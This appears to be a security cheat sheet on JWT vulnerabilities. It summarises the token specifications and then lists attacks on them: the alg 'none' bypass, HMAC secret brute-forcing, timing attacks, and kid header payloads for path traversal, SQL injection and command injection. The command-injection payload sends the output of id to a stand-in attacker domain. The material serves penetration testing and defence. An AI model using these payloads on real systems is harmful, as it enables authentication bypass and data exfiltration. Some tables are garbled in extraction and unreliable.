Professional Documents
Culture Documents
JSON Web Token Vulnerabilities
JSON Web Token Vulnerabilities
JSON Web Token (JWT) represents a set of claims as a JSON object that is encoded in a JSON Web Signature (JWS) and/or JSON Web Encryption
(JWE) structure. A JWT is represented as a sequence of URL-safe parts (JWT claims sets) separated by the . characters. Each part contains a
base64url-encoded value. The number of parts in the JWT is dependent upon the representation of the resulting JWS using the JWS compact
serialization or JWE using the JWE compact serialization.
{% hint style="info" %} base64url algorithm is the base64 algorithm which has the following replacements:
"+" to "-"
"/" to "_"
and there is no standard base64 padding, which usually consists of the "=" signs {% endhint %}
JWT claims
The JWT claims set represents a JSON object whose members are the claims conveyed by the JWT. There are three classes of JWT claim names:
iss Issuer String or URI The "iss" claim identifies the principal that issued the JWT
sub Subject String or URI The "sub" claim identifies the principal that is the subject of the JWT
Expiration The "exp" claim identifies the expiration time on or after which the JWT must not be
exp NumericDate
Time accepted for processing
The "nbf" claim identifies the time before which the JWT must not be accepted for
nbf Not Before NumericDate
processing
iat Issued At NumericDate The "iat" claim identifies the time at which the JWT was issued
jti JWT ID String The "jti" claim provides a unique identifier for the JWT
JOSE header
{% hint style="info" %} The JOSE (JSON Object Signing and Encryption) header is a JSON object containing the parameters describing the
cryptographic operations and parameters employed {% endhint %}
For a JWT object, the members of the JSON object represented by the JOSE header describe the cryptographic operations applied to the JWT and
optionally, additional properties of the JWT. Depending upon whether the JWT is a JWS or JWE, the corresponding rules for the JOSE header values
apply.
There are two closely related serializations for JWS which both share the same cryptographic underpinnings:
The JWS Compact Serialization is a compact, URL-safe representation intended for space-constrained environments such as HTTP Authorization
headers and URI query parameters.
The JWS JSON Serialization represents JWSs as JSON objects and enables multiple signatures and/or MACs to be applied to the same content.
{% hint style="info" %} The JWT is a JWS using the JWS compact serialization {% endhint %}
1. JOSE Header
2. JWS Payload
3. JWS Signature
JOSE header
For a JWS, the members of the JSON object(s) representing the JOSE header describe the digital signature or MAC applied to the JWS protected
header and the JWS payload and optionally additional properties of the JWS.
The "alg" header parameter identifies the cryptographic algorithm used to secure
alg Algorithm String or URI the JWS. You can find a list of possible values in the JWA specification in section
3.1
The "jku" header parameter is a URI that refers to a resource for a set of JSON-
jku JWK Set URL URI encoded public keys (as JWK set), one of which corresponds to the key used to
digitally sign the JWS
The "jwk" header parameter is the public key that corresponds to the key used to
jwk JSON Web Key JWK
digitally sign the JWS
The "kid" header parameter is a hint indicating which key was used to secure the
kid Key ID String JWS. When used with a JWK, the kid value is used to match a JWK "kid" parameter
value
The "x5u" header parameter is a URI that refers to a resource for the X.509 public
x5u X.509 URL URI key certificate or certificate chain in PEM-encoded form corresponding to the key
used to digitally sign the JWS
X.509
Array of certificate value The "x5c" header parameter contains the X.509 public key certificate or certificate
x5c Certificate
strings chain corresponding to the key used to digitally sign the JWS
Chain
X.509
The "x5t#S256" header parameter is a base64url-encoded SHA-256 thumbprint
Certificate
x5t#S256 String (digest) of the DER encoding of the X.509 certificate corresponding to the key
SHA-256
used to digitally sign the JWS
Thumbprint
The "typ" header parameter is used by JWS applications to declare the media type
of this complete JWS. This is intended for use by the application when more than
typ Type IANA.MediaTypes one kind of object could be present in an application data structure that can
contain a JWS. To indicate that this object is a JWT, recommended to use the
"JWT" value
The "cty" header parameter is used by JWS applications to declare the media type
[IANA.MediaTypes] of the secured content (the payload). In the normal case in
which nested signing operations are not employed, the use of this header
cty Content Type IANA.MediaTypes
parameter is not recommended. In the case that nested signing is employed, this
header parameter must be present; in this case, the value must be "JWT", to
indicate that a nested JWT is carried in this JWT
JWS payload
The sequence of octets to be secured (the message). The payload can contain an arbitrary sequence of octets.
JWS signature
Digital signature or MAC over the JWS protected header and the JWS payload. Since JWT uses JWS compact serialization, JWS unprotected headers
are not used.
There are two closely related serializations for JWE which both share the same cryptographic underpinnings:
The JWE Compact Serialization is a compact, URL-safe representation intended for space constrained environments such as HTTP Authorization
headers and URI query parameters.
The JWE JSON Serialization represents JWEs as JSON objects and enables the same content to be encrypted to multiple parties.
{% hint style="info" %} The JWT is a JWE using the JWE compact serialization {% endhint %}
1. JOSE Header
2. JWE Encrypted Key
3. JWE Initialization Vector
4. JWE AAD
5. JWE Ciphertext
6. JWE Authentication Tag
JOSE header
For a JWE, the members of the JSON object(s) representing the JOSE header describe the encryption applied to the plaintext and optionally
additional properties of the JWE.
The JOSE Header members are the union of the members of these values:
JWE Protected Header - JSON object that contains the header parameters that are integrity protected by the authenticated encryption
operation. These parameters apply to all recipients of the JWE. For the JWE compact serialization, this comprises the entire JOSE header. For the
JWE JSON serialization, this is one component of the JOSE header.
JWE Shared Unprotected Header - JSON object that contains the header parameters that apply to all recipients of the JWE that are not integrity
protected. This can only be present when using the JWE JSON serialization.
JWE Per-Recipient Unprotected Header - JSON object that contains header parameters that apply to a single recipient of the JWE. These header
parameter values are not integrity protected. This can only be present when using the JWE JSON serialization.
The "enc" header parameter identifies the content encryption algorithm used to
perform authenticated encryption on the plaintext to produce the ciphertext and
Encryption
enc String or URI the authentication tag. This algorithm must be an AEAD algorithm with a
Algorithm
specified key length. You can find a list of possible values in the JWA specification
in section 5.1
Compression
zip String The "zip" applied to the plaintext before encryption, if any
Algorithm
Parameter Definition Type Description
The "jku" header parameter is a URI that refers to a resource for a set of JSON-
jku JWK Set URL URI encoded public keys (as JWK set), one of which the JWE was encrypted; this can
be used to determine the private key needed to decrypt the JWE
The "jwk" header parameter is the public key that corresponds to the key used to
jwk JSON Web Key JWK encrypt the JWE; this can be used to determine the private key needed to decrypt
the JWE
The "kid" header parameter is a hint indicating which key was used to encrypt
kid Key ID String the JWE. When used with a JWK, the kid value is used to match a JWK "kid"
parameter value
The "x5u" header parameter is a URI that refers to a resource for the X.509 public
x5u X.509 URL URI key certificate or certificate chain in PEM-encoded form corresponding to the key
used to encrypt the JWE
X.509 Certificate Array of certificate value The "x5c" header parameter contains the X.509 public key certificate or certificate
x5c
Chain strings chain corresponding to the key used to encrypt the JWE
X.509 certificate The "x5t" header parameter is a base64url-encoded SHA-1 thumbprint (digest) of
x5t SHA-1 String the DER encoding of the X.509 certificate corresponding to the key used to
thumbprint encrypt the JWE
typ Type IANA.MediaTypes The "typ" header parameter is used by JWE applications to declare the media
type of this complete JWE. This is intended for use by the application when more
than one kind of object could be present in an application data structure that can
Parameter Definition Type Description
contain a JWE. To indicate that this object is a JWT, recommended to use the
"JWT" value
The "cty" header parameter is used by JWE applications to declare the media
type [IANA.MediaTypes] of the secured content (the plaintext). In the normal case
in which nested encryption operations are not employed, the use of this header
cty Content Type IANA.MediaTypes
parameter is not recommended. In the case that nested encryption is employed,
this header parameter must be present; in this case, the value must be "JWT", to
indicate that a nested JWT is carried in this JWT
Content encryption key is a symmetric key for the AEAD algorithm used to encrypt the plaintext to produce the ciphertext and the authentication
tag {% endhint %}
Encrypted content encryption key value. Note that for some algorithms, the JWE encrypted key value is specified as being the empty octet sequence.
JWE AAD
{% hint style="info" %} Additional Authenticated Data (AAD) is an input to an AEAD operation that is integrity protected but not encrypted. {%
endhint %}
AAD is an additional value to be integrity protected by the authenticated encryption operation. This can only be present when using the JWE JSON
serialization.
Note that this can also be achieved when using either the JWE compact serialization or the JWE JSON serialization by including the AAD value as an
integrity-protected header parameter value, but at the cost of the value being double base64url encoded.
JWE Ciphertext
Ciphertext is a value resulting from authenticated encryption of the plaintext with additional authenticated data.
Authentication tag is a value resulting from authenticated encryption of the plaintext with additional authenticated data.
To exploit this, change the "alg" value to none and send the JWT token without (or with) the signature to an API endpoint. If the none algorithm is
supported, the JWT token will be valid.
none
None
NONE
nOnE
References:
References:
FusionAuth JWT: The library does not check the situation if signature algorithm is defined but no signature is provided
Invalid signature.
Expected 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgB1Y= got 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgBOo=
References:
HMAC-based algorithms use a secret key to create (and validate) a signature. You can try to bruteforce the secret key with hashcat:
References:
References:
CVE-2016-10555
CVE-2016-5431
References:
CVE-2018-0114
[jose] High risk vulnerability in RFC 7515
perl-Crypt-JWT: fix JWS signature validation (proper jwk header + kid_keys handling)
1. The signature from JWS is verified byte by byte with the correct signature (generated by the side that accepts the JWS).
2. The verification ends on the first inconsistent byte.
To exploit the timing attack, observe the response times by generating sequential signatures, starting with the first byte, then moving on to the
second, and so on.
References:
Weak algorithms
There are interesting researches:
Critical Vulnerability Uncovered in JSON Encryption - incorrect implementation of the ECDH-ES algorithm allows an attacker to recover the
private key.
Practical Cryptanalysis of Json Web Token and Galois Counter Mode’s Implementations - Google researchers are writing about AES in the GCM
mode in context of JWT, and they sum up: GCM is fragile, but its implementations were rarely checked.
Chosen Ciphertext Attacks Against Protocols Based on the RSA Encryption Standard PKCS #1 - the article describes an attack to RSA encryption
with PKCS1v1.5 padding, which is allowed to be used according to the specification (also see here).
References:
{% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/server-side-request-forgery" %}
Command injection
kid parameter can be passed to the system-like function, that will lead to the command injection:
{
"alg": "HS256",
"typ": "JWT",
"kid": "kid;dig $(id | base64 -w0).attacker-website.com",
}
Path traversal
The kid parameter specifies the path to the key in a filesystem, which is used to verify the token. If an attacker enters the path to a file with
predictable content in the kid parameter, they will be able to generate a forged token since the secret key is already known. One such file is the
/proc/sys/kernel/randomize_va_space , which is used in Linux systems and has predictable values like 0,1,2 . An attacker can create a malicious
token using secret values 0,1,2 and send it to the server.
{
"alg": "HS256",
"typ": "JWT",
"kid": "../../../../../../../dev/null",
}
SQL injection
An application can store its keys in a database. If such a key is referenced in the kid parameter, it might be vulnerable to SQL injection.
{
"alg": "HS256",
"typ": "JWT",
"kid": "key' UNION SELECT 'hop",
}
Substitution attacks
There are attacks in which one recipient will have a JWT intended for it and attempt to use it at a different recipient that it was not intended for. This
applies to the following cases:
An application does not validate (or does not validate correctly) that the cryptographic keys used for the cryptographic operations in the JWT
belong to the issuer (the iss claim).
An application does not validate (or does not validate correctly) that the subject value (the sub claim) corresponds to a valid subject and/or
issuer/subject pair at the application (this may include confirming that the issuer is trusted by the application).
The aud claim is not used (or is used incorrectly) to determine whether the JWT is being used by an intended party or was substituted by an
attacker at an unintended party when the same issuer can issue JWTs that are intended for use by more than one relying party or application.
Cross-JWT confusion
Since JWTs are used by different protocols in different application areas, you can try to issue a JWT token for one purpose and use it for a different
purpose.
Replay attack
If expiring and revoking mechanisms have weaknesses, JWT tokens can be used for replay attacks. In this case, need to pay attention to "exp"
(expiration date of a token) and "jti" (unique token identifier) claims, and try to use an expired/revoked JWT token.
References:
Tool
{% embed url="https://github.com/ticarpi/jwt_tool" %}
{% embed url="https://github.com/hahwul/jwt-hack" %}
References
RFC7519: JSON Web Token (JWT)
RFC7515: JSON Web Signature (JWS)
RFC7516: JSON Web Encryption (JWE)
JSON Web Token Best Current Practices
Securitum: JWT (JSON Web Token) (in)security
Redhunt Labs: A Practical Guide to Attacking JWT (JSON Web Tokens)